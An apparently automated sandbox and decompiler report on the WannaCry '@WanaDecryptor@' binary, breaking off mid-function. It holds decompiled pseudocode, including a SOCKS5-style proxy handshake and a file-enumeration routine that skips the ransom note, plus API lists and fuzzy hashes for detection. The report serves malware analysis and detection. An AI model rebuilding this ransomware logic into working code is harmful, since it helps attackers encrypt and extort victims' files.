                                                      				E00401000( &_v196, 0);
                                                      				_t24 = __imp__time;
                                                      				_v8 = 0;
                                                      				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                                      				_t22 =  *0x4218a0; // 0x0
                                                      				_t28 = _t26 - 0xb8 + 4;
                                                      				if(_t14 - _t22 < 0x12c) {
                                                      					_v36 = 0;
                                                      				}
                                                      				_v32 = 0;
                                                      				L00412B72(); // executed
                                                      				_t16 = _v28;
                                                      				if(_t16 >= 0) {
                                                      					_t16 =  *_t24(0);
                                                      					_t28 = _t28 + 4;
                                                      					 *0x4218a0 = _t16;
                                                      				}
                                                      				 *0x4218a4 =  *0x4218a4 + 1;
                                                      				_v4 = 1;
                                                      				L00412C9E();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t16;
                                                      			}



















                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 55%
                                                      			E00401970(intOrPtr _a4) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _t6;
                                                      				intOrPtr* _t10;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134D8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t10;
                                                      				_t6 = _a4;
                                                      				_v4 = 0;
                                                      				_push(_t6);
                                                      				_push(0x406);
                                                      				L00412CE6();
                                                      				L00412CE0(); // executed
                                                      				_v12 = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *_t10;
                                                      				return _t6;
                                                      			}








                                                      APIs
                                                      • #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                      • #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                      • #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3092#6199#800
                                                      • String ID:
                                                      • API String ID: 3924541682-0
                                                      • Opcode ID: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                                      • Instruction ID: e5ca7d8525ee00d79fb0b85b86dd9e556083ecc507c08eb16956c090e8f9caf4
                                                      • Opcode Fuzzy Hash: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                                      • Instruction Fuzzy Hash: 9DE04FB5248781ABD310DF14C942B6EBBA4FB94B20F208F1DF665937C0D77C9454CA66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
                                                      				void* _t3;
                                                      
                                                      				_push(1);
                                                      				_push(0x100);
                                                      				_push(0);
                                                      				L00412DDC();
                                                      				_t3 = __ecx + 0x40;
                                                      				_push(_t3); // executed
                                                      				L00412DD6(); // executed
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				L00412C14();
                                                      				return _t3;
                                                      			}





                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                                      • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                      
                                                      				_t1 =  &_a16; // 0x413236
                                                      				_push( *_t1);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				L0041343E(); // executed
                                                      				return __eax;
                                                      			}




                                                      APIs
                                                      • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1576
                                                      • String ID: 62A
                                                      • API String ID: 1976119259-856450375
                                                      • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                                      • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                      • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E00405860(void* __ecx, signed int _a4) {
                                                      				struct tagRECT _v16;
                                                      				signed int _t15;
                                                      				signed int _t23;
                                                      				void* _t24;
                                                      
                                                      				_t24 = __ecx;
                                                      				_t23 = _a4;
                                                      				if( *(__ecx + 0x74) == 0) {
                                                      					 *(__ecx + 0x74) = _t23;
                                                      				}
                                                      				GetClientRect( *(_t24 + 0x20),  &_v16);
                                                      				_push(2);
                                                      				_push(_v16.bottom - _v16.top);
                                                      				_t15 = ( *((intOrPtr*)(_t24 + 0x68)) +  *((intOrPtr*)(_t24 + 0x60))) * _t23;
                                                      				_push(_t15);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(0);
                                                      				L00412E60(); // executed
                                                      				return _t15;
                                                      			}








                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 0040587E
                                                      • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 004058A5
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #6197ClientRect
                                                      • String ID:
                                                      • API String ID: 2663203813-0
                                                      • Opcode ID: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                                      • Instruction ID: 7afc014e2c7f757f2c38916e7ea6268c43ad9ab86f90261082180cf4c9fc0c78
                                                      • Opcode Fuzzy Hash: 08365d4a6b4c4d135f9bc492184b9046fd35a4d0fa1764fa72772bf707b20851
                                                      • Instruction Fuzzy Hash: 56F03075740601AFE324DE19CD56F67F7E9EBD4B00F00891EB985D7390D670F8048695
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E004058C0(void* __ecx, signed int _a4) {
                                                      				struct tagRECT _v16;
                                                      				void* _t15;
                                                      				signed int _t23;
                                                      				void* _t24;
                                                      
                                                      				_t24 = __ecx;
                                                      				_t23 = _a4;
                                                      				if( *(__ecx + 0x70) == 0) {
                                                      					 *(__ecx + 0x70) = _t23;
                                                      				}
                                                      				GetClientRect( *(_t24 + 0x20),  &_v16);
                                                      				_push(2);
                                                      				_t15 = _v16.right - _v16.left;
                                                      				_push(( *((intOrPtr*)(_t24 + 0x6c)) +  *((intOrPtr*)(_t24 + 0x64))) * _t23);
                                                      				_push(_t15);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(0);
                                                      				L00412E60(); // executed
                                                      				return _t15;
                                                      			}








                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 004058DE
                                                      • #6197.MFC42(00000000,00000000,00000000,?,?,00000002), ref: 00405905
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #6197ClientRect
                                                      • String ID:
                                                      • API String ID: 2663203813-0
                                                      • Opcode ID: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                                      • Instruction ID: 12e2120aa947bc0da8521fdfe4b738009e277cbc90461cf2c188bbd8c1c7c24c
                                                      • Opcode Fuzzy Hash: 562337e5099e57004b5b98cc37fc2bf590d1ad0ce7ac89810234b565acd6d4d2
                                                      • Instruction Fuzzy Hash: 60F01776700B01AFE214DA28C846F6BF7E9FBD4600F00891EB981D7290D6B0F8158A95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0040D8C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24) {
                                                      				void* _v0;
                                                      				intOrPtr _v16;
                                                      				signed int _v20;
                                                      				char _v266;
                                                      				char _v267;
                                                      				char _v268;
                                                      				char _v272;
                                                      				char _v280;
                                                      				char _v282;
                                                      				signed int _v283;
                                                      				char _v284;
                                                      				void _v287;
                                                      				void _v288;
                                                      				char _v289;
                                                      				char _v290;
                                                      				char _v291;
                                                      				char _v292;
                                                      				signed int _v296;
                                                      				char _v304;
                                                      				char _v312;
                                                      				char _v313;
                                                      				signed int _v315;
                                                      				char _v323;
                                                      				signed int _v324;
                                                      				signed int _t58;
                                                      				signed int _t65;
                                                      				signed int* _t66;
                                                      				void* _t71;
                                                      				void* _t74;
                                                      				void* _t86;
                                                      				signed int* _t87;
                                                      				void _t89;
                                                      				signed int _t111;
                                                      				signed int _t112;
                                                      				signed int _t117;
                                                      				void* _t127;
                                                      				void* _t132;
                                                      				void* _t141;
                                                      				intOrPtr _t143;
                                                      
                                                      				_t58 =  *((intOrPtr*)(_v0 + 4))(_a4, _a8, _a24, _t132);
                                                      				if(_t58 != 0) {
                                                      					L24:
                                                      					return _t58 | 0xffffffff;
                                                      				} else {
                                                      					_t141 = _v0;
                                                      					_t89 = 0;
                                                      					_v272 = 0;
                                                      					if(_a8 != 0) {
                                                      						asm("repne scasb");
                                                      						_t89 = 1;
                                                      						_v272 = 1;
                                                      					}
                                                      					_v268 = 5;
                                                      					_v267 = 1;
                                                      					_v266 = 0;
                                                      					_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v268, 3);
                                                      					if(_t58 < 0) {
                                                      						L22:
                                                      						_t143 = _a4;
                                                      						if(_t143 > 0) {
                                                      							__imp__#3(_t143); // executed
                                                      						}
                                                      						goto L24;
                                                      					} else {
                                                      						_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v280, 2);
                                                      						if(_t58 < 0 || _v292 != 5 || _v291 == 0xff) {
                                                      							goto L22;
                                                      						} else {
                                                      							_v292 = 5;
                                                      							_v291 = 1;
                                                      							_v290 = 0;
                                                      							if(_v16 == 0) {
                                                      								_v289 = 1;
                                                      								_v288 =  *_t141;
                                                      								_t65 = _v20;
                                                      								_v283 = _t65;
                                                      								_v284 = _t65 >> 8;
                                                      								_t66 =  &_v282;
                                                      							} else {
                                                      								_v289 = 3;
                                                      								_t111 = _v296 & 0x000000ff;
                                                      								_v288 = _t89;
                                                      								_t112 = _t111 >> 2;
                                                      								memcpy( &_v287, _t141, _t112 << 2);
                                                      								_t86 = memcpy(_t141 + _t112 + _t112, _t141, _t111 & 0x00000003);
                                                      								_t117 = _v20;
                                                      								 *_t86 = _t117 >> 8;
                                                      								_t87 = _t86 + 1;
                                                      								 *_t87 = _t117;
                                                      								_t66 =  &(_t87[0]);
                                                      							}
                                                      							_t58 =  *((intOrPtr*)(_v0 + 0x20))(_a4,  &_v292, _t66 -  &_v292);
                                                      							if(_t58 < 0) {
                                                      								goto L22;
                                                      							} else {
                                                      								_t58 =  *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v304, 4);
                                                      								if(_t58 < 0) {
                                                      									goto L22;
                                                      								} else {
                                                      									_t58 = _v315;
                                                      									if(_t58 != 0) {
                                                      										goto L22;
                                                      									} else {
                                                      										_t71 = _v313 - 1;
                                                      										if(_t71 == 0) {
                                                      											_t127 = _v0;
                                                      											_push(6);
                                                      											goto L19;
                                                      										} else {
                                                      											_t74 = _t71 - 2;
                                                      											if(_t74 == 0) {
                                                      												 *((intOrPtr*)(_v0 + 0x24))(_a4,  &_v312, 1);
                                                      												_t127 = _v0;
                                                      												_push((_v324 & 0x000000ff) + 2);
                                                      												_push( &_v323);
                                                      												_push(_a4);
                                                      												goto L20;
                                                      											} else {
                                                      												if(_t74 != 1) {
                                                      													L21:
                                                      													return 0;
                                                      												} else {
                                                      													_t127 = _v0;
                                                      													_push(0x12);
                                                      													L19:
                                                      													_push( &_v312);
                                                      													_push(_a4);
                                                      													L20:
                                                      													_t58 =  *((intOrPtr*)(_t127 + 0x24))();
                                                      													if(_t58 < 0) {
                                                      														goto L22;
                                                      													} else {
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}











































                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                                      • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                                      • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E004068E0(intOrPtr _a4) {
                                                      				intOrPtr _t5;
                                                      				intOrPtr _t8;
                                                      				intOrPtr _t9;
                                                      
                                                      				_t5 = _a4;
                                                      				_t8 =  *((intOrPtr*)(_t5 + 4));
                                                      				if(_t8 != 0x100) {
                                                      					if(_t8 != 0x104 ||  *((intOrPtr*)(_t5 + 8)) != 0x73) {
                                                      						goto L7;
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					_t9 =  *((intOrPtr*)(_t5 + 8));
                                                      					if(_t9 == 0xd || _t9 == 0x1b) {
                                                      						return 1;
                                                      					} else {
                                                      						L7:
                                                      						_push(_t5); // executed
                                                      						L00412CB6(); // executed
                                                      						return _t5;
                                                      					}
                                                      				}
                                                      			}







                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5280
                                                      • String ID:
                                                      • API String ID: 2434734067-0
                                                      • Opcode ID: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                                      • Instruction ID: 7c996b979d0e86874aef4d69ce28bf61b51dac78b1e0fd433df73bfd4df6564a
                                                      • Opcode Fuzzy Hash: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                                      • Instruction Fuzzy Hash: 45E0B6B97011008AEA20CB04C294A5FA292A7E0714F76C077E1899BAA9C27DCDE1CA1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                                      • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                                      • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID:
                                                      • API String ID: 1507349165-0
                                                      • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                                      • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                                      • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
                                                      				void* _t109;
                                                      				intOrPtr* _t110;
                                                      				int _t111;
                                                      				void* _t115;
                                                      				intOrPtr* _t116;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr _t124;
                                                      				char _t125;
                                                      				intOrPtr* _t129;
                                                      				intOrPtr* _t131;
                                                      				intOrPtr* _t135;
                                                      				int _t139;
                                                      				int _t145;
                                                      				int _t146;
                                                      				int _t147;
                                                      				int _t149;
                                                      				int _t154;
                                                      				intOrPtr* _t221;
                                                      				void _t225;
                                                      				intOrPtr* _t226;
                                                      				wchar_t* _t227;
                                                      				intOrPtr* _t228;
                                                      				intOrPtr* _t229;
                                                      				void* _t231;
                                                      				void* _t232;
                                                      				intOrPtr _t234;
                                                      				void* _t235;
                                                      				void* _t236;
                                                      				void* _t237;
                                                      				void* _t238;
                                                      				void* _t239;
                                                      				void* _t240;
                                                      				void* _t242;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041356E);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t234;
                                                      				_t235 = _t234 - 0x56c;
                                                      				_t232 = __ecx;
                                                      				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                                      				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                                      				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                                      				 *(_t235 + 0x584) = 0;
                                                      				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                                      				 *((char*)(_t235 + 0x588)) = 1;
                                                      				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                                      				_t236 = _t235 + 0xc;
                                                      				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                                      				 *(_t236 + 0x18) = _t109;
                                                      				if(_t109 != 0xffffffff) {
                                                      					while(1) {
                                                      						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      						if(_t110 != 0 &&  *_t110 != 0) {
                                                      							break;
                                                      						}
                                                      						_t111 = wcscmp(_t236 + 0x358, ".");
                                                      						_t236 = _t236 + 8;
                                                      						if(_t111 != 0) {
                                                      							_t139 = wcscmp(_t236 + 0x358, L"..");
                                                      							_t236 = _t236 + 8;
                                                      							if(_t139 != 0) {
                                                      								_push(_t236 + 0x358);
                                                      								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                                      								_t236 = _t236 + 0x10;
                                                      								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                                      									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                                      									_t236 = _t236 + 8;
                                                      									if(_t145 != 0) {
